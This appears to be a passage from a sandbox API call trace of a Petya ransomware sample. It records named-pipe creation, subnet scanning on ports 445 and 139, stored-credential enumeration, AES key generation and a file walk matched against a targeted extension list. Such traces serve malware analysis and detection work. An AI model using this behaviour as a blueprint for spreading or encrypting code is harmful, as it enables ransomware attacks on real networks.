StrCmpIW (psz1="1R6PFH", psz2="192.168.0.1") returned 1 [0035.627] NetServerEnum (in: servername=0x0, level=0x65, bufptr=0xf4f804, prefmaxlen=0xffffffff, entriesread=0xf4f800, totalentries=0xf4f7f8, servertype=0x80000000, domain=0x0, resume_handle=0xf4f7fc | out: bufptr=0xf4f804, entriesread=0xf4f800, totalentries=0xf4f7f8, resume_handle=0xf4f7fc) returned 0x17e6 [0052.077] Sleep (dwMilliseconds=0x2bf20) Thread: id = 5 os_tid = 0x96c [0036.422] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x4f05c0, dwRevision=0x1 | out: pSecurityDescriptor=0x4f05c0) returned 1 [0036.422] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x4f05c0, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x4f05c0) returned 1 [0036.422] CreateNamedPipeW (lpName="\\\\.\\pipe\\{0D32AB4E-3BEE-44D4-A8CC-67331E9E7F80}" (normalized: "\\device\\namedpipe\\{0d32ab4e-3bee-44d4-a8cc-67331e9e7f80}"), dwOpenMode=0x3, dwPipeMode=0x6, nMaxInstances=0x1, nOutBufferSize=0x0, nInBufferSize=0x0, nDefaultTimeOut=0x0, lpSecurityAttributes=0x132f9c0) returned 0x194 [0036.423] ConnectNamedPipe (in: hNamedPipe=0x194, lpOverlapped=0x0 | out: lpOverlapped=0x0) returned 1 [0037.843] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x132f9d0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x132f9d0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0037.843] Sleep (dwMilliseconds=0x3e8) [0039.008] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x132f9d0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x132f9d0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0039.008] Sleep (dwMilliseconds=0x3e8) Thread: id = 7 os_tid = 0x980 [0036.424] GetAdaptersInfo (in: AdapterInfo=0x0, SizePointer=0x28fcb08 | out: AdapterInfo=0x0, SizePointer=0x28fcb08) returned 0x6f [0036.687] LocalAlloc (uFlags=0x40, uBytes=0x280) returned 0x5553e8 [0036.687] GetAdaptersInfo (in: AdapterInfo=0x5553e8, SizePointer=0x28fcb08 | out: AdapterInfo=0x5553e8, SizePointer=0x28fcb08) returned 0x0 [0036.690] inet_addr (cp="192.168.0.200") returned 0xc800a8c0 [0036.690] inet_addr (cp="255.255.255.0") returned 0xffffff [0036.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x555598, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0036.691] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x555598, cbMultiByte=-1, lpWideCharStr=0x48be20, cchWideChar=14 | out: lpWideCharStr="192.168.0.200") returned 14 [0036.691] StrCmpIW (psz1="127.0.0.1", psz2="192.168.0.200") returned -1 [0036.691] StrCmpIW (psz1="localhost", psz2="192.168.0.200") returned 1 [0036.691] StrCmpIW (psz1="1R6PFH", psz2="192.168.0.200") returned 1 [0036.691] StrCmpIW (psz1="192.168.0.1", psz2="192.168.0.200") returned -1 [0036.691] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5555e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0036.691] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5555e8, cbMultiByte=-1, lpWideCharStr=0x4f05e0, cchWideChar=12 | out: lpWideCharStr="192.168.0.1") returned 12 [0036.691] StrCmpIW (psz1="127.0.0.1", psz2="192.168.0.1") returned -1 [0036.691] StrCmpIW (psz1="localhost", psz2="192.168.0.1") returned 1 [0036.691] StrCmpIW (psz1="1R6PFH", psz2="192.168.0.1") returned 1 [0036.691] StrCmpIW (psz1="192.168.0.1", psz2="192.168.0.1") returned 0 [0036.692] NetServerGetInfo (in: servername=0x0, level=0x65, bufptr=0x28fcae4 | out: bufptr=0x28fcae4) returned 0x0 [0037.879] NetApiBufferFree (Buffer=0x554388) returned 0x0 [0037.879] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x48daa8 [0037.879] inet_addr (cp="255.255.255.255") returned 0xffffffff [0037.880] htonl (hostlong=0xa8c0) returned 0xc0a80000 [0037.880] htonl (hostlong=0xff00a8c0) returned 0xc0a800ff [0037.880] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xe8e04, lpParameter=0x48daa8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1bc [0037.881] CloseHandle (hObject=0x1bc) returned 1 [0037.881] LocalFree (hMem=0x5553e8) returned 0x0 Thread: id = 8 os_tid = 0x994 Thread: id = 9 os_tid = 0x998 [0037.953] htonl (hostlong=0xc0a80000) returned 0xa8c0 [0037.953] socket (af=2, type=1, protocol=0) returned 0x1d8 [0039.615] htons (hostshort=0x1bd) returned 0xbd01 [0039.615] ioctlsocket (in: s=0x1d8, cmd=-2147195266, argp=0x2c5f830 | out: argp=0x2c5f830) returned 0 [0039.615] connect (s=0x1d8, name=0x2c5f820*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.0"), namelen=16) returned -1 [0039.629] select (in: nfds=473, readfds=0x0, writefds=0x2c5f718, exceptfds=0x0, timeout=0x2c5f834 | out: readfds=0x0, writefds=0x2c5f718, exceptfds=0x0) returned 0 [0041.660] __WSAFDIsSet (param_1=0x1d8, param_2=0x2c5f718) returned 0 [0041.660] closesocket (s=0x1d8) returned 0 [0041.662] socket (af=2, type=1, protocol=0) returned 0x1d8 [0041.662] htons (hostshort=0x8b) returned 0x8b00 [0041.662] ioctlsocket (in: s=0x1d8, cmd=-2147195266, argp=0x2c5f830 | out: argp=0x2c5f830) returned 0 [0041.662] connect (s=0x1d8, name=0x2c5f820*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.0"), namelen=16) returned -1 [0041.663] select (in: nfds=473, readfds=0x0, writefds=0x2c5f718, exceptfds=0x0, timeout=0x2c5f834 | out: readfds=0x0, writefds=0x2c5f718, exceptfds=0x0) returned 0 [0043.674] __WSAFDIsSet (param_1=0x1d8, param_2=0x2c5f718) returned 0 [0043.674] closesocket (s=0x1d8) returned 0 [0043.675] htonl (hostlong=0xc0a80001) returned 0x100a8c0 [0043.675] socket (af=2, type=1, protocol=0) returned 0x1d8 [0043.675] htons (hostshort=0x1bd) returned 0xbd01 [0043.675] ioctlsocket (in: s=0x1d8, cmd=-2147195266, argp=0x2c5f830 | out: argp=0x2c5f830) returned 0 [0043.675] connect (s=0x1d8, name=0x2c5f820*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.1"), namelen=16) returned -1 [0043.690] select (in: nfds=473, readfds=0x0, writefds=0x2c5f718, exceptfds=0x0, timeout=0x2c5f834 | out: readfds=0x0, writefds=0x2c5f718, exceptfds=0x0) returned 0 [0047.260] __WSAFDIsSet (param_1=0x1d8, param_2=0x2c5f718) returned 0 [0047.260] closesocket (s=0x1d8) returned 0 [0047.261] socket (af=2, type=1, protocol=0) returned 0x1d8 [0047.262] htons (hostshort=0x8b) returned 0x8b00 [0047.262] ioctlsocket (in: s=0x1d8, cmd=-2147195266, argp=0x2c5f830 | out: argp=0x2c5f830) returned 0 [0047.262] connect (s=0x1d8, name=0x2c5f820*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.1"), namelen=16) returned -1 [0047.263] select (in: nfds=473, readfds=0x0, writefds=0x2c5f718, exceptfds=0x0, timeout=0x2c5f834 | out: readfds=0x0, writefds=0x2c5f718, exceptfds=0x0) returned 0 [0049.273] __WSAFDIsSet (param_1=0x1d8, param_2=0x2c5f718) returned 0 [0049.273] closesocket (s=0x1d8) returned 0 [0049.274] htonl (hostlong=0xc0a80002) returned 0x200a8c0 [0049.274] socket (af=2, type=1, protocol=0) returned 0x1d8 [0049.275] htons (hostshort=0x1bd) returned 0xbd01 [0049.275] ioctlsocket (in: s=0x1d8, cmd=-2147195266, argp=0x2c5f830 | out: argp=0x2c5f830) returned 0 [0049.275] connect (s=0x1d8, name=0x2c5f820*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.2"), namelen=16) returned -1 [0049.290] select (in: nfds=473, readfds=0x0, writefds=0x2c5f718, exceptfds=0x0, timeout=0x2c5f834 | out: readfds=0x0, writefds=0x2c5f718, exceptfds=0x0) returned 0 [0051.398] __WSAFDIsSet (param_1=0x1d8, param_2=0x2c5f718) returned 0 [0051.398] closesocket (s=0x1d8) returned 0 [0051.399] socket (af=2, type=1, protocol=0) returned 0x1d8 [0051.400] htons (hostshort=0x8b) returned 0x8b00 [0051.400] ioctlsocket (in: s=0x1d8, cmd=-2147195266, argp=0x2c5f830 | out: argp=0x2c5f830) returned 0 [0051.400] connect (s=0x1d8, name=0x2c5f820*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.2"), namelen=16) returned -1 [0051.400] select (in: nfds=473, readfds=0x0, writefds=0x2c5f718, exceptfds=0x0, timeout=0x2c5f834 | out: readfds=0x0, writefds=0x2c5f718, exceptfds=0x0) returned 0 [0053.763] __WSAFDIsSet (param_1=0x1d8, param_2=0x2c5f718) returned 0 [0053.774] closesocket (s=0x1d8) returned 0 [0053.826] htonl (hostlong=0xc0a80003) returned 0x300a8c0 [0053.826] socket (af=2, type=1, protocol=0) returned 0x19c [0053.826] htons (hostshort=0x1bd) returned 0xbd01 [0053.826] ioctlsocket (in: s=0x19c, cmd=-2147195266, argp=0x2c5f830 | out: argp=0x2c5f830) returned 0 [0053.827] connect (s=0x19c, name=0x2c5f820*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.3"), namelen=16) returned -1 [0053.828] select (in: nfds=413, readfds=0x0, writefds=0x2c5f718, exceptfds=0x0, timeout=0x2c5f834 | out: readfds=0x0, writefds=0x2c5f718, exceptfds=0x0) returned 0 [0055.841] __WSAFDIsSet (param_1=0x19c, param_2=0x2c5f718) returned 0 [0056.172] closesocket (s=0x19c) returned 0 [0056.173] socket (af=2, type=1, protocol=0) returned 0x19c [0056.173] htons (hostshort=0x8b) returned 0x8b00 [0056.173] ioctlsocket (in: s=0x19c, cmd=-2147195266, argp=0x2c5f830 | out: argp=0x2c5f830) returned 0 [0056.173] connect (s=0x19c, name=0x2c5f820*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.3"), namelen=16) returned -1 [0056.256] select (nfds=413, readfds=0x0, writefds=0x2c5f718, exceptfds=0x0, timeout=0x2c5f834) Thread: id = 18 os_tid = 0x9a8 [0039.311] GetCurrentThread () returned 0xfffffffe [0039.312] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xb, OpenAsSelf=1, TokenHandle=0x292fbd8 | out: TokenHandle=0x292fbd8*=0x0) returned 0 [0039.312] WNetOpenEnumW (in: dwScope=0x1, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x292fb84 | out: lphEnum=0x292fb84*=0x554388) returned 0x0 [0039.987] WNetEnumResourceW (in: hEnum=0x554388, lpcCount=0x292fb8c, lpBuffer=0x540708, lpBufferSize=0x292fb90 | out: lpcCount=0x292fb8c, lpBuffer=0x540708, lpBufferSize=0x292fb90) returned 0x103 [0039.987] WNetCloseEnum (hEnum=0x554388) returned 0x0 [0039.987] CredEnumerateW (in: Filter=0x0, Flags=0x0, Count=0x292fb94, Credential=0x292fb90 | out: Count=0x292fb94, Credential=0x292fb90) returned 0 [0039.990] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xea073, lpParameter=0x4f1540, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x228 [0039.991] WaitForMultipleObjects (nCount=0x1, lpHandles=0x292fbe8*=0x228, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0039.991] Sleep (dwMilliseconds=0x2710) [0051.834] Sleep (dwMilliseconds=0x2710) Thread: id = 19 os_tid = 0x9ac [0039.315] Sleep (dwMilliseconds=0x0) [0039.365] GetTickCount () returned 0x10d96 [0039.365] wsprintfW (in: param_1=0x131b714, param_2="%d" | out: param_1="10") returned 2 [0039.366] StrCatW (in: psz1="", psz2="10" | out: psz1="10") returned="10" [0039.366] StrCatW (in: psz1="10", psz2="" | out: psz1="10") returned="10" [0039.366] PathFindFileNameW (pszPath="C:\\Users\\HJRD1K~1\\Desktop\\Petya.dll") returned="Petya.dll" [0039.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="192.168.0.1", cchWideChar=-1, lpMultiByteStr=0x131be04, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="192.168.0.1", lpUsedDefaultChar=0x0) returned 12 [0039.366] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0039.366] GetTickCount () returned 0x10d96 [0039.366] socket (af=2, type=1, protocol=6) returned 0x1f0 [0039.639] ioctlsocket (in: s=0x1f0, cmd=-2147195266, argp=0x131badc | out: argp=0x131badc) returned 0 [0039.639] htons (hostshort=0x1bd) returned 0xbd01 [0039.639] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0039.639] connect (s=0x1f0, name=0x131bacc*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.1"), namelen=16) returned -1 [0039.640] GetTickCount () returned 0x10ea0 [0039.640] GetTickCount () returned 0x10ea0 [0039.640] htons (hostshort=0x85) returned 0x8500 [0039.641] select (in: nfds=0, readfds=0x0, writefds=0x131b9b4, exceptfds=0x0, timeout=0x131bab8 | out: readfds=0x0, writefds=0x131b9b4, exceptfds=0x0) returned 0 [0054.709] closesocket (s=0x1f0) returned 0 [0054.710] Sleep (dwMilliseconds=0x2710) Thread: id = 20 os_tid = 0x9b0 [0039.621] CryptAcquireContextW (in: phProv=0x551bb0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x551bb0*=0x557e08) returned 1 [0039.622] CryptGenKey (in: hProv=0x557e08, Algid=0x660e, dwFlags=0x1, phKey=0x551bbc | out: phKey=0x551bbc*=0x54aba0) returned 1 [0039.625] CryptSetKeyParam (hKey=0x54aba0, dwParam=0x4, pbData=0x2e4f818*=0x1, dwFlags=0x0) returned 1 [0039.625] CryptSetKeyParam (hKey=0x54aba0, dwParam=0x3, pbData=0x2e4f814*=0x1, dwFlags=0x0) returned 1 [0039.625] PathCombineW (in: pszDest=0x2e4f400, pszDir="C:\\", pszFile="*" | out: pszDest="C:\\*") returned="C:\\*" [0039.630] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x2e4efa8 | out: lpFindFileData=0x2e4efa8) returned 0x54abe0 [0039.631] PathCombineW (in: pszDest=0x2e4f1f8, pszDir="C:\\", pszFile="$Recycle.Bin" | out: pszDest="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0039.632] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\$Recycle.Bin") returned 0x0 [0039.632] PathCombineW (in: pszDest=0x2e4eb70, pszDir="C:\\$Recycle.Bin", pszFile="*" | out: pszDest="C:\\$Recycle.Bin\\*") returned="C:\\$Recycle.Bin\\*" [0039.632] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 0x54ac60 [0039.633] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.633] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.633] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\$Recycle.Bin", pszFile="S-1-5-21-1463843789-3877896393-3178144628-1000" | out: pszDest="C:\\$Recycle.Bin\\S-1-5-21-1463843789-3877896393-3178144628-1000") returned="C:\\$Recycle.Bin\\S-1-5-21-1463843789-3877896393-3178144628-1000" [0039.633] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\$Recycle.Bin\\S-1-5-21-1463843789-3877896393-3178144628-1000") returned 0x0 [0039.633] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\$Recycle.Bin\\S-1-5-21-1463843789-3877896393-3178144628-1000", pszFile="*" | out: pszDest="C:\\$Recycle.Bin\\S-1-5-21-1463843789-3877896393-3178144628-1000\\*") returned="C:\\$Recycle.Bin\\S-1-5-21-1463843789-3877896393-3178144628-1000\\*" [0039.633] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1463843789-3877896393-3178144628-1000\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54aca0 [0039.633] FindNextFileW (in: hFindFile=0x54aca0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.633] FindNextFileW (in: hFindFile=0x54aca0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.633] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\$Recycle.Bin\\S-1-5-21-1463843789-3877896393-3178144628-1000", pszFile="desktop.ini" | out: pszDest="C:\\$Recycle.Bin\\S-1-5-21-1463843789-3877896393-3178144628-1000\\desktop.ini") returned="C:\\$Recycle.Bin\\S-1-5-21-1463843789-3877896393-3178144628-1000\\desktop.ini" [0039.633] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0039.634] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".ini.") returned 5 [0039.634] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".ini.") returned 0x0 [0039.634] FindNextFileW (in: hFindFile=0x54aca0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.634] FindClose (in: hFindFile=0x54aca0 | out: hFindFile=0x54aca0) returned 1 [0039.634] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 0 [0039.634] FindClose (in: hFindFile=0x54ac60 | out: hFindFile=0x54ac60) returned 1 [0039.634] FindNextFileW (in: hFindFile=0x54abe0, lpFindFileData=0x2e4efa8 | out: lpFindFileData=0x2e4efa8) returned 1 [0039.634] PathCombineW (in: pszDest=0x2e4f1f8, pszDir="C:\\", pszFile="Boot" | out: pszDest="C:\\Boot") returned="C:\\Boot" [0039.634] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot") returned 0x0 [0039.634] PathCombineW (in: pszDest=0x2e4eb70, pszDir="C:\\Boot", pszFile="*" | out: pszDest="C:\\Boot\\*") returned="C:\\Boot\\*" [0039.635] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 0x54ac60 [0039.635] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.635] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.635] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="BCD" | out: pszDest="C:\\Boot\\BCD") returned="C:\\Boot\\BCD" [0039.635] PathFindExtensionW (pszPath="BCD") returned="" [0039.635] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.635] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="BCD.LOG" | out: pszDest="C:\\Boot\\BCD.LOG") returned="C:\\Boot\\BCD.LOG" [0039.635] PathFindExtensionW (pszPath="BCD.LOG") returned=".LOG" [0039.635] wsprintfW (in: param_1=0x2e4ed78, param_2="%ws." | out: param_1=".LOG.") returned 5 [0039.635] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".LOG.") returned 0x0 [0039.635] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.636] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="BCD.LOG1" | out: pszDest="C:\\Boot\\BCD.LOG1") returned="C:\\Boot\\BCD.LOG1" [0039.636] PathFindExtensionW (pszPath="BCD.LOG1") returned=".LOG1" [0039.636] wsprintfW (in: param_1=0x2e4ed78, param_2="%ws." | out: param_1=".LOG1.") returned 6 [0039.636] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".LOG1.") returned 0x0 [0039.636] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.636] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="BCD.LOG2" | out: pszDest="C:\\Boot\\BCD.LOG2") returned="C:\\Boot\\BCD.LOG2" [0039.636] PathFindExtensionW (pszPath="BCD.LOG2") returned=".LOG2" [0039.636] wsprintfW (in: param_1=0x2e4ed78, param_2="%ws." | out: param_1=".LOG2.") returned 6 [0039.636] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".LOG2.") returned 0x0 [0039.636] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.636] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="BOOTSTAT.DAT" | out: pszDest="C:\\Boot\\BOOTSTAT.DAT") returned="C:\\Boot\\BOOTSTAT.DAT" [0039.636] PathFindExtensionW (pszPath="BOOTSTAT.DAT") returned=".DAT" [0039.636] wsprintfW (in: param_1=0x2e4ed78, param_2="%ws." | out: param_1=".DAT.") returned 5 [0039.637] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".DAT.") returned 0x0 [0039.637] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.637] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="cs-CZ" | out: pszDest="C:\\Boot\\cs-CZ") returned="C:\\Boot\\cs-CZ" [0039.637] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\cs-CZ") returned 0x0 [0039.637] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\cs-CZ", pszFile="*" | out: pszDest="C:\\Boot\\cs-CZ\\*") returned="C:\\Boot\\cs-CZ\\*" [0039.637] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.641] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.641] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.641] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\cs-CZ", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" [0039.641] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.642] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.642] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.642] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.642] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.642] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.642] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="da-DK" | out: pszDest="C:\\Boot\\da-DK") returned="C:\\Boot\\da-DK" [0039.642] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\da-DK") returned 0x0 [0039.642] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\da-DK", pszFile="*" | out: pszDest="C:\\Boot\\da-DK\\*") returned="C:\\Boot\\da-DK\\*" [0039.642] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.643] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.643] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.643] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\da-DK", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned="C:\\Boot\\da-DK\\bootmgr.exe.mui" [0039.643] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.643] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.643] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.643] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.643] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.643] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.643] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="de-DE" | out: pszDest="C:\\Boot\\de-DE") returned="C:\\Boot\\de-DE" [0039.644] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\de-DE") returned 0x0 [0039.644] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\de-DE", pszFile="*" | out: 